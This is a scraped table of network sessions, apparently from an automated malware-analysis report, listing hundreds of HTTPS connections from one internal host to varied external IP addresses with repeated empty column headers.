                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11183192.168.2.1449714158.150.21.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11184192.168.2.145793088.84.230.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11185192.168.2.1460768130.60.133.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11186192.168.2.143397658.31.107.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11187192.168.2.1449746197.192.236.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11188192.168.2.1437992143.39.86.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11189192.168.2.144771843.8.57.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11190192.168.2.1453384133.187.35.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11191192.168.2.1442468148.213.199.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192192.168.2.144213696.173.202.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11193192.168.2.143716057.29.143.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11194192.168.2.14594542.108.215.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11195192.168.2.1433912176.147.180.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11196192.168.2.145264666.233.238.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11197192.168.2.1435188157.206.9.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11198192.168.2.146060041.175.205.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11199192.168.2.1449066219.144.76.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11200192.168.2.1443948218.233.134.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11201192.168.2.145436289.235.116.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11202192.168.2.1446980124.183.171.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11203192.168.2.143838667.10.148.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11204192.168.2.144751018.161.184.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11205192.168.2.143291885.203.254.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11206192.168.2.1445494136.195.40.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11207192.168.2.1445770143.180.223.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11208192.168.2.1449256114.63.193.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11209192.168.2.1445540208.60.115.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11210192.168.2.144818483.146.100.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11211192.168.2.145647851.209.131.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11212192.168.2.1445114102.199.36.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11213192.168.2.144024488.58.39.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11214192.168.2.144764491.5.115.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11215192.168.2.145765684.144.234.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11216192.168.2.1445330147.165.150.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11217192.168.2.1433378161.74.21.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11218192.168.2.1434408171.254.157.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11219192.168.2.143822252.243.168.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11220192.168.2.1436568217.61.139.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11221192.168.2.145842885.69.2.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11222192.168.2.143675484.233.183.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11223192.168.2.1451076132.35.33.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11224192.168.2.1451996132.210.22.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11225192.168.2.1444864148.195.4.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11226192.168.2.144403899.50.88.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11227192.168.2.145376814.39.184.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11228192.168.2.145853852.41.204.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11229192.168.2.144272432.156.57.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11230192.168.2.1454350116.200.230.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11231192.168.2.1459998108.215.157.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11232192.168.2.1447392173.126.85.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11233192.168.2.1449420106.59.254.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11234192.168.2.144529050.142.73.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11235192.168.2.146057218.3.157.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11236192.168.2.1442472109.82.152.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11237192.168.2.1457530202.44.62.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11238192.168.2.1437812191.115.95.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11239192.168.2.1458460156.21.165.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11240192.168.2.14444604.78.36.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11241192.168.2.144665462.18.29.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11242192.168.2.1452334126.52.162.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11243192.168.2.144415686.188.59.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11244192.168.2.143836296.26.230.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11245192.168.2.1450814164.166.238.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11246192.168.2.1434782162.213.124.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11247192.168.2.14408129.94.228.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11248192.168.2.1455276162.81.63.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11249192.168.2.1448670114.250.29.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11250192.168.2.1434374113.192.209.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11251192.168.2.145237817.6.151.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11252192.168.2.1457814171.8.74.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11253192.168.2.145073697.243.50.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11254192.168.2.144356825.200.190.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11255192.168.2.1449448201.178.224.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11256192.168.2.1450982130.140.241.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11257192.168.2.1441348190.229.61.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11258192.168.2.1454276151.111.205.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11259192.168.2.1444732140.255.136.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11260192.168.2.1436610151.36.133.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11261192.168.2.143543812.83.238.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11262192.168.2.1458754156.58.180.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11263192.168.2.145768413.23.10.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11264192.168.2.145727073.47.182.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11265192.168.2.143580671.113.190.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11266192.168.2.1438356162.64.65.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11267192.168.2.1460832106.0.25.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11268192.168.2.1446290103.97.91.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11269192.168.2.1444994192.30.21.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11270192.168.2.1449536182.242.92.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11271192.168.2.14362988.89.113.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11272192.168.2.1440202116.48.74.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11273192.168.2.145337467.67.122.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11274192.168.2.1446016209.156.160.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11275192.168.2.143519482.114.162.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11276192.168.2.1454936223.127.45.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11277192.168.2.1452870112.38.221.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11278192.168.2.143681266.56.24.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11279192.168.2.1432964159.168.254.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11280192.168.2.143428835.212.123.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11281192.168.2.143727435.101.12.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11282192.168.2.14566281.95.161.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11283192.168.2.1455134149.53.81.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11284192.168.2.1456158170.203.98.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11285192.168.2.1453022117.186.94.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11286192.168.2.1440124142.120.240.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11287192.168.2.144953678.8.46.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11288192.168.2.1438490109.11.27.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11289192.168.2.145216435.195.11.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11290192.168.2.1439320160.108.71.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11291192.168.2.144236460.249.8.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11292192.168.2.144896618.12.22.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11293192.168.2.1450664159.138.160.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11294192.168.2.1453348216.161.246.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11295192.168.2.143532624.159.252.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11296192.168.2.14564922.8.92.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11297192.168.2.144268465.164.138.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11298192.168.2.1459466197.187.83.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11299192.168.2.1441036221.5.148.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11300192.168.2.144177677.35.251.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11301192.168.2.145660432.85.138.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11302192.168.2.1444062183.61.10.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11303192.168.2.1453258172.151.4.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11304192.168.2.14543008.51.201.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11305192.168.2.1433778122.46.81.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11306192.168.2.1454390105.58.255.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11307192.168.2.1452408217.97.95.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11308192.168.2.144317293.54.167.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11309192.168.2.145145025.126.34.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11310192.168.2.143289437.114.15.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11311192.168.2.1460126179.72.40.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11312192.168.2.14552241.112.58.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11313192.168.2.1439724197.87.157.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11314192.168.2.1455890177.2.250.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11315192.168.2.145968618.212.179.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11316192.168.2.144036419.203.129.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11317192.168.2.144087632.129.225.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11318192.168.2.1460596175.105.85.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11319192.168.2.1442376173.214.167.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11320192.168.2.143305461.56.239.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11321192.168.2.1441040133.47.208.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11322192.168.2.1454062179.197.37.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11323192.168.2.1450510193.108.157.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11324192.168.2.145952083.167.37.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11325192.168.2.1460474191.161.217.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11326192.168.2.144823285.250.27.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11327192.168.2.1440552172.173.58.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11328192.168.2.144229431.194.151.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11329192.168.2.1450756129.238.33.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11330192.168.2.145083897.129.209.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11331192.168.2.143740239.116.51.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11332192.168.2.1442716210.200.196.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11333192.168.2.1450506143.198.183.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11334192.168.2.1457016191.164.141.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11335192.168.2.143866095.62.224.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11336192.168.2.1446316177.247.233.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11337192.168.2.1432770112.157.188.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11338192.168.2.1444120194.83.125.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11339192.168.2.1440038103.213.5.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11340192.168.2.143345483.241.135.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11341192.168.2.1459124161.32.246.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11342192.168.2.145948464.240.84.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11343192.168.2.1443650154.182.143.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11344192.168.2.143449643.104.104.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11345192.168.2.1449074219.230.184.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11346192.168.2.1460266171.100.172.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11347192.168.2.1437686106.121.16.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11348192.168.2.1434594161.211.230.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11349192.168.2.1440298198.20.177.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11350192.168.2.1440900111.96.168.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11351192.168.2.1446854209.59.176.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11352192.168.2.1440662129.63.41.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11353192.168.2.1438274168.88.130.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11354192.168.2.1453206148.94.242.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11355192.168.2.1440916202.27.77.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11356192.168.2.1433104223.11.19.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11357192.168.2.145627469.121.121.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11358192.168.2.1442602155.70.36.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11359192.168.2.143571448.230.119.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11360192.168.2.1457954131.24.3.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11361192.168.2.1451538195.235.143.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11362192.168.2.1449422184.86.132.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11363192.168.2.143366870.169.62.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11364192.168.2.1443534155.194.26.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11365192.168.2.1446726212.182.39.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11366192.168.2.1439576181.211.185.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11367192.168.2.1436198116.181.162.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11368192.168.2.145075888.179.203.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11369192.168.2.144412236.149.193.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11370192.168.2.1435646178.196.54.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11371192.168.2.144247614.163.240.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11372192.168.2.145758093.25.68.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11373192.168.2.1446378156.113.46.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11374192.168.2.143940076.199.30.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11375192.168.2.1459550104.30.25.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11376192.168.2.1435526113.61.220.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11377192.168.2.143533871.232.65.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11378192.168.2.1434826166.71.35.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11379192.168.2.1443268116.67.32.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11380192.168.2.143382087.108.86.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11381192.168.2.1443272140.149.94.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11382192.168.2.145685669.21.60.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11383192.168.2.1449844212.12.83.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11384192.168.2.1441990107.162.149.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11385192.168.2.1437828186.231.235.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11386192.168.2.1447026106.161.213.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11387192.168.2.1459738207.123.171.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11388192.168.2.144059695.27.222.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11389192.168.2.144382070.99.93.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11390192.168.2.144055098.119.219.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11391192.168.2.1448184169.238.204.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11392192.168.2.1455202135.12.22.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11393192.168.2.1456552189.80.115.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11394192.168.2.145879261.148.142.198443
                                                        TimestampBytes transferredDirectionData


